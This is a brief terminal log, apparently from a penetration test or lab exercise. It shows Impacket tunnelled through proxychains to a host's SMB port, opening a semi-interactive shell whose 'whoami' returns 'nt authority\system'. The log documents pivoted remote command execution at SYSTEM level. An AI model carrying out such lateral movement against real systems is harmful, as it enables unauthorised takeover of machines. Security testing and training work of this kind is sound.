Impacket v0.13.0.dev0+20250307.160229.6e0a9691 - Copyright Fortra, LLC and its affiliated companies
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:445 ... OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system